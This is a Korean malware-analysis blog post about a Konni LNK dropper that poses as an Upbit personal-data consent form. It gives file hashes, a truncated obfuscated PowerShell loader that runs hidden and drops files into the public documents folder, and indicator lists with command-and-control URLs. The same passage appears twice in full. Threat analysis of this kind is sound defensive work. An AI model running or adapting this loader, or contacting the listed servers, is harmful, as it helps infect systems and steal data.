북한 해킹 단체 Konni(코니)에서는 만든 업비트 사칭 악성코드-첨부1_성명_개인정보수집이용동의서.docx.lnk(2024.03.07)
Contents
오늘은 북한 해킹 단체인 Konni(코니) 에서는 만든 업비트 사칭 악성코드-첨부1_성명_개인정보수집이용동의서.docx.lnk(2024.03.07)에 대해 글을 적어 보겠습니다.
해당 업비트(Upbit) 는 대한민국의 대표적인 암호화폐 거래소이며 증권플러스를 개발 및 운영하는 두나무가 해외 비트렉스(Bittrex)와 독점 제휴를 맺고 2017년 10월 암호화폐거래소 업비트를 출범된 기업입니다. 일단 해당 악성코드는 개인적 생각으로 가상화폐(암호화폐)를 계정 탈취 및 가상화폐(암호화폐)를 탈취를 해서 북한 미사일 개발에 사용할 자금을 마련하기 위해서가 아닐까 생각이 됩니다. 이것은 어디까지 난 사견(私見) 입니다.
악성코드 해쉬값은 다음과 같습니다.
파일명:부1_성명_개인정보수집이용동의서.docx.zip
사이즈:530 KB
MD5:8e7bd31ba55449c888d3b013612f539a
SHA-1:ca64ca50a07e1936fe00f2ff8509f03c5e1b3826
SHA-256:27cd090cf83877750416d37dc6ddd8ff319b4854414e4275d67f96652376bcf0
이며 해당 악성코드는 압축 파일 형태로 해서 이메일로 전송되면 해당 악성코드를 열면 다음과 같은 파일을 들을 확인할 수가 있습니다.
첨부1_성명_개인정보수집이용동의서.docx.lnk(655893b1641565f8ea04da4d74116b8a)
첨부2_업비트 메일 내용(참고)(0d1383c289d511acd9d8d8644c224c61)
이며 첨부1_성명_개인정보수집이용동의서.docx.lnk(655893b1641565f8ea04da4d74116b8a)가 PowerShell(파워셀)로 된 악성코드가 포함이 되어져 있습니다.
PowerShell(파워셀) 내용
commandlinearguments: /c p^owe^rshe^l^l -windowstyle h(i)dden function QceEeRCSkI{param($UHCYbGzPEWQZ); ^<#missible#^>$oPath = Split-Path $UH(C)YbGzPEWQZ;^<#rewwore#^> retur(n) $oP(a)th;} ;functi(o)n MHMPpQGMSz{p(a)ram($YCev(Q)qmRGu); ^<#bio(p)hysically#(^)>$o(P)ath = $(Y)CevQqmRGu.subst(r)ing(0,$YCevQ(q)mRGu.length-4) (+) ''; ^<#baw(l)ing#^>return $oPath;} ;function GzAaIfXbMpmZ{$knPgzVjI(u)N = $env:public^<#(e)dginesses#^> (+) '\' (+) 'UHCYbG(.)cab';^<#ko(r)anic#^> return $knP(g)zVjIuN;};funct(i)on YLfJLrHwhVv{$jHCBAmkIQGt = $env:pub(l)ic^<#stampman#^> (+) '\' (+)^<#shatan#^> 'docume(n)ts';^<#un(i)mproved#^> return $jHC(B)AmkIQGt;};function Ign(D)oFlYXTz{$YDczVPCcDt = $env:public^<#porphyrize#^> (+)'\documents\start(.)vbs';^<#blameab(l)y#^> return $YDczVPCcDt(;)};function vnQykam (h)ms{param($zQAJWCjcuWU);^<#unmo(d)ifiability#^> remove-it(e)m ^<#syn(d)actylous#^> -p(a)th $zQAJW(C)jcuWU ^<#mero(h)edral#^> -force;};fu(n)ction koMIo(W)akvBvW{param …
해당 업비트(Upbit) 는 대한민국의 대표적인 암호화폐 거래소이며 증권플러스를 개발 및 운영하는 두나무가 해외 비트렉스(Bittrex)와 독점 제휴를 맺고 2017년 10월 암호화폐거래소 업비트를 출범된 기업입니다. 일단 해당 악성코드는 개인적 생각으로 가상화폐(암호화폐)를 계정 탈취 및 가상화폐(암호화폐)를 탈취를 해서 북한 미사일 개발에 사용할 자금을 마련하기 위해서가 아닐까 생각이 됩니다. 이것은 어디까지 난 사견(私見) 입니다.
악성코드 해쉬값은 다음과 같습니다.
파일명:부1_성명_개인정보수집이용동의서.docx.zip
사이즈:530 KB
MD5:8e7bd31ba55449c888d3b013612f539a
SHA-1:ca64ca50a07e1936fe00f2ff8509f03c5e1b3826
SHA-256:27cd090cf83877750416d37dc6ddd8ff319b4854414e4275d67f96652376bcf0
이며 해당 악성코드는 압축 파일 형태로 해서 이메일로 전송되면 해당 악성코드를 열면 다음과 같은 파일을 들을 확인할 수가 있습니다.
첨부1_성명_개인정보수집이용동의서.docx.lnk(655893b1641565f8ea04da4d74116b8a)
첨부2_업비트 메일 내용(참고)(0d1383c289d511acd9d8d8644c224c61)
이며 첨부1_성명_개인정보수집이용동의서.docx.lnk(655893b1641565f8ea04da4d74116b8a)가 PowerShell(파워셀)로 된 악성코드가 포함이 되어져 있습니다.
PowerShell(파워셀) 내용
commandlinearguments: /c p^owe^rshe^l^l -windowstyle h(i)dden function QceEeRCSkI{param($UHCYbGzPEWQZ); ^<#missible#^>$oPath = Split-Path $UH(C)YbGzPEWQZ;^<#rewwore#^> retur(n) $oP(a)th;} ;functi(o)n MHMPpQGMSz{p(a)ram($YCev(Q)qmRGu); ^<#bio(p)hysically#(^)>$o(P)ath = $(Y)CevQqmRGu.subst(r)ing(0,$YCevQ(q)mRGu.length-4) (+) ''; ^<#baw(l)ing#^>return $oPath;} ;function GzAaIfXbMpmZ{$knPgzVjI(u)N = $env:public^<#(e)dginesses#^> (+) '\' (+) 'UHCYbG(.)cab';^<#ko(r)anic#^> return $knP(g)zVjIuN;};funct(i)on YLfJLrHwhVv{$jHCBAmkIQGt = $env:pub(l)ic^<#stampman#^> (+) '\' (+)^<#shatan#^> 'docume(n)ts';^<#un(i)mproved#^> return $jHC(B)AmkIQGt;};function Ign(D)oFlYXTz{$YDczVPCcDt = $env:public^<#porphyrize#^> (+)'\documents\start(.)vbs';^<#blameab(l)y#^> return $YDczVPCcDt(;)};function vnQykam (h)ms{param($zQAJWCjcuWU);^<#unmo(d)ifiability#^> remove-it(e)m ^<#syn(d)actylous#^> -p(a)th $zQAJW(C)jcuWU ^<#mero(h)edral#^> -force;};fu(n)ction koMIo(W)akvBvW{param …
IoC
0d1383c289d511acd9d8d8644c224c61
27cd090cf83877750416d37dc6ddd8ff319b4854414e4275d67f96652376bcf0
655893b1641565f8ea04da4d74116b8a
8e7bd31ba55449c888d3b013612f539a
ca64ca50a07e1936fe00f2ff8509f03c5e1b3826
http://stuckss.com/list.php
http://stuckss.com/upload.php
https://goosess.com/read/get.php
27cd090cf83877750416d37dc6ddd8ff319b4854414e4275d67f96652376bcf0
655893b1641565f8ea04da4d74116b8a
8e7bd31ba55449c888d3b013612f539a
ca64ca50a07e1936fe00f2ff8509f03c5e1b3826
http://stuckss.com/list.php
http://stuckss.com/upload.php
https://goosess.com/read/get.php